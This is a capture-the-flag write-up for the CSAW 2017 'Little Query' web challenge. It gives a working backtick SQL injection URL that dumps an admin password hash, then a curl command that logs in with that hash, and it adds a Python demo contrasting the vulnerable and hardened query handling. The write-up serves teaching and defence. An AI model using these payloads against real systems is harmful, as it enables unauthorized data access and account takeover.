CSAW CTF Qualification Round 2017 - Little Query [200]


Little Query - 200 Points

littlequery.chal.csaw.io


Some background reading before tackling this challenge:

SQL Injection



The site has only a "Main Page" and a "Sign In" button.

Open the page source:

<!--
<div class="col-md-4">
    <h2>For Developers</h2>
    <p>Check out our <a href="/api/db_explore.php">API</a></p>
</div>
-->

Append " /api/db_explore.php " to the site's URL:

" littlequery.chal.csaw.io/api/db_explore.php "

output:

" Must specify mode={schema|preview} "

Set the mode to schema by adding " ?mode=schema ":

" littlequery.chal.csaw.io/api/db_explore.php?mode=schema "

output:

" {"dbs":["littlequery"]} "

Add " &db=littlequery ":

" littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery "

output:

" {"tables":["user"]} "

Finally, add " &table=user ":

" littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user "

output:

" {"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}} "

This gives us the column names and types: uid, username (varchar(128)) and password (varchar(40)). A 40-character password column suggests the passwords are stored as hex-encoded SHA-1 hashes rather than in plaintext.

Now change " ..?mode=schema.. " to " ..?mode=preview.. ":

" littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user "

Aww.. snap!.

output:

" Database 'littlequery' is not allowed to be previewed "

Try changing the parameter " db=littlequery " to an arbitrary database name, e.g. " db=coba ":

" littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=coba&table=user "

output:

" 'coba'.'user' doesn't exist. "

The error quotes the database and table names separately, which suggests the two parameters are concatenated into the query as quoted identifiers, roughly:

" SELECT * FROM `$db`.`$table` "

Note that the "not allowed to be previewed" check is evaluated on the raw db parameter, not on the database the final query actually reads. So if the db parameter contains something other than the bare string littlequery but still makes the query touch that database, the check is bypassed.

Now we can build the exploit: close the backtick around db ourselves, supply `.`user` as the table, and comment out the remainder of the generated query with " -- - " (MySQL requires whitespace after " -- ", hence the %20). The table parameter is left empty:

" http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20-&table= "

The server then executes " SELECT * FROM `littlequery`.`user`-- -`.`` ", where everything after " -- " is a comment.

output:

" [{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}] "
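To make the inferred query construction concrete, here is an added example (not the challenge's PHP, which we never saw) that models it in Python with an in-memory SQLite database. The vulnerable preview function applies the "not allowed" check to the raw db parameter and then pastes both parameters into the query as backtick-quoted identifiers, so the db value from the URL above slips past the check and the generated statement becomes SELECT * FROM `littlequery`.`user`-- -`.``. The hardened variant beside it shows why the fix hinted at by the flag is not enough on its own: mysql_real_escape_string escapes quotes and backslashes inside string literals but does not touch backticks, so identifiers must instead be validated and resolved against the live schema before the query is built. The database name, table, columns, admin row and the NOT_PREVIEWABLE set are constructed here from what the API returned; the function names are my own.

```python
import re
import sqlite3

# Constructed stand-in for the challenge database: the same db/table/column
# names the API revealed and the one admin row it leaked. Not the real backend.
ADMIN_HASH = "5896e92d38ee883cc09ad6f88df4934f6b074cf8"


def build_db():
    """In-memory SQLite with an attached database named 'littlequery'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS littlequery")
    conn.execute(
        "CREATE TABLE littlequery.user (uid INTEGER, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO littlequery.user VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    return conn


# Databases that preview mode refuses, as the API's error message implies.
NOT_PREVIEWABLE = {"littlequery"}


def preview_vulnerable(conn, db, table):
    """Models the inferred server logic (assumption, not the challenge's code):
    the allow-check inspects the raw db parameter, then both parameters are
    concatenated into the statement as backtick-quoted identifiers."""
    if db in NOT_PREVIEWABLE:
        raise PermissionError(f"Database '{db}' is not allowed to be previewed")
    sql = f"SELECT * FROM `{db}`.`{table}`"
    return conn.execute(sql).fetchall()


IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def preview_hardened(conn, db, table):
    """Hardened variant: identifiers are checked syntactically, resolved against
    the live schema, and the allow-check runs on the resolved database name."""
    if not IDENT.fullmatch(db) or not IDENT.fullmatch(table):
        raise ValueError("identifiers may contain only [A-Za-z0-9_]")
    known_dbs = {row[1] for row in conn.execute("PRAGMA database_list")}
    if db not in known_dbs:
        raise LookupError(f"unknown database '{db}'")
    if db in NOT_PREVIEWABLE:
        raise PermissionError(f"Database '{db}' is not allowed to be previewed")
    known_tables = {
        row[0]
        for row in conn.execute(
            f"SELECT name FROM `{db}`.sqlite_master WHERE type='table'"
        )
    }
    if table not in known_tables:
        raise LookupError(f"'{db}'.'{table}' doesn't exist.")
    return conn.execute(f"SELECT * FROM `{db}`.`{table}`").fetchall()


# The db value from the writeup's URL, percent-decoded: it closes the backtick,
# names the table itself and comments out the rest of the generated query.
PAYLOAD_DB = "littlequery`.`user`-- -"


def demo():
    """Runs the honest request, the injected request and the hardened handler."""
    conn = build_db()
    results = {}
    try:
        preview_vulnerable(conn, "littlequery", "user")
    except PermissionError as e:
        results["direct"] = str(e)          # refused, as on the real API
    results["injected"] = preview_vulnerable(conn, PAYLOAD_DB, "")  # admin row
    try:
        preview_hardened(conn, PAYLOAD_DB, "")
    except ValueError as e:
        results["hardened"] = str(e)        # payload rejected before any SQL
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running the block prints the refusal for the direct request, the dumped admin row for the injected one, and the identifier-validation error from the hardened handler. The point of the hardened version is that the allow-list decision and the identifier used in SQL are the same validated string, so there is no gap between what is checked and what is queried.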

Now open " http://littlequery.chal.csaw.io/login.php ".

Intercept the request so you can grab the session cookie; the username is "admin" and the password value is the dumped hash "5896e92d38ee883cc09ad6f88df4934f6b074cf8". Use either:

  • Tamper Data (Mozilla)

or

  • Burp Suite

Copy the cookie:

" PHPSESSID=vcfdft70ucstqe30afs9dtv2 "

Then log in with cURL rather than the browser, because the page's JavaScript blocks the login even with the username "admin" and the password "5896e92d38ee883cc09ad6f88df4934f6b074cf8":

" curl -X POST http://littlequery.chal.csaw.io/login.php --data "username=admin&password=5896e92d38ee883cc09ad6f88df4934f6b074cf8" -v "

The verbose output shows the server issuing the session cookie, " Set-Cookie: PHPSESSID=vcfdft70ucstqe30afs9dtv2; path=/ ", and the logged-in session leads to " /query.php ", which yields the flag:

flag:{mayb3_1ts_t1m3_4_real_real_escape_string?}
